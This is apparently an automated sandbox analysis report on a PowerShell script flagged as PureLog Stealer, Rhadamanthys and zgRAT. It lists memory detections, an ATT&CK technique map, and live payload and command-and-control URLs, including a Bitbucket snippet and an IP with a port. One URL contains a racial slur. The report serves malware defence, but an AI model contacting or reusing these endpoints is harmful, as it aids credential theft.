Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C754E0 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,

5_2_05C754E0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: Amcache.hve.11.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2380719391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2382423562.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2383562069.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2375768763.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2426889440.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2380719391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2382423562.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2383562069.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2375768763.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2426889440.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.26c39780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	21 Input Capture	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	41 Registry Run Keys / Startup Folder	211 Process Injection	1 Obfuscated Files or Information	LSASS Memory	135 System Information Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	41 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
atomxml.ps1	0%	ReversingLabs
atomxml.ps1	3%	Virustotal		Browse

Source	Detection	Scanner	Label
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf?	0%	Avira URL Cloud	safe
https://hot7jan.blogspot.com	0%	Avira URL Cloud	safe
https://hot7jan.blogspot.com///////nigger.pdf	0%	Avira URL Cloud	safe
https://hot7jan.blogspot.com///////nigger.pdfX	0%	Avira URL Cloud	safe
http://hot7jan.blogspot.com	0%	Avira URL Cloud	safe
https://hot7jan.blogspot.com///////nigger.pdf)	0%	Avira URL Cloud	safe
https://hot7jan.blogspot.com/atom.xml	0%	Avira URL Cloud	safe
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlfx	0%	Avira URL Cloud	safe
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
bitbucket.org	185.166.143.48	true	false	high
blogspot.l.googleusercontent.com	142.250.185.225	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
hot7jan.blogspot.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://hot7jan.blogspot.com///////nigger.pdf	false	Avira URL Cloud: safe	unknown
https://hot7jan.blogspot.com/atom.xml	false	Avira URL Cloud: safe	unknown
https://bitbucket.org/!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt	false		high
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/	powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf?	fontdrvhost.exe, 00000011.00000002.2383025146.00000000030AD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hot7jan.blogspot.com	powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F7E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bitbucket.org	powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.11.dr	false		high
http://hot7jan.blogspot.com	powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://blogspot.l.googleusercontent.com	powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hot7jan.blogspot.com///////nigger.pdfX	powershell.exe, 0000001A.00000002.2691050205.00000260A298A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.cookielaw.org/	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A251D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hot7jan.blogspot.com///////nigger.pdf)	mshta.exe, 0000001C.00000003.2650742069.000001CC25CD6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org	powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlfx	fontdrvhost.exe, 00000010.00000002.2425796582.00000000030AC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.166.143.48	bitbucket.org	Germany		16509	AMAZON-02US	false
142.250.185.225	blogspot.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585909
Start date and time:	2025-01-08 13:53:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
